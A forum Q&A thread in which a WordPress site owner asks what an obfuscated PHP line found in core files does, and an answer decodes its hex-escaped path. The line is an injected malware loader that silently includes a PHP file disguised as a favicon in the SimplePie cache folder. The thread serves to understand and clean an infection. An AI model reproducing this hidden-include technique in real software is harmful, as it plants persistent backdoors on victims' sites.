# How to decode this php file code?

Tags: virus

I have this code in my wordpress files:

```
<?php

@include "\x2fhom\x65/pa\x74iek\x61l/d\x6fmai\x6es/w\x65bmo\x64e.l\x74/pu\x62lic\x5fhtm\x6c/wp\x2dinc\x6cude\x73/Si\x6dple\x50ie/\x43ach\x65/fa\x76ico\x6e_7a\x62318\x2eico";
```

?>

I think its a virus, but what he does for my website?

Comment: What is the content of this file?

Comment: This code are in seperate files like wp-settings.php, index.php and etc

Comment: No, I mean what is the content of \x2fhom\x65/pa\x74iek\x61l/d\x6fmai\x6es/w\x65bmo\x64e.l\x74/pu\x62lic\x5fhtm\x6c/wp\x2dinc\x6cude\x73/Si\x6dple\x50ie/\x43ach\x65/fa\x76ico\x6e_7a\x62318\x2eico file

Comment: I do not know, for this reason i have created this topic, i dont know hot to decode this code and what he is doing

Comment: So, there is no file with that path in your server?

Comment: I dont see the full patch is encoded, how i can see witch file are included?

Answer (score 0):

just paste it in python, it can decode it from hex to ASCII.

'/home/patiekal/domains/webmode.lt/public_html/wp-includes/SimplePie/Cache/favicon_7ab318.ico'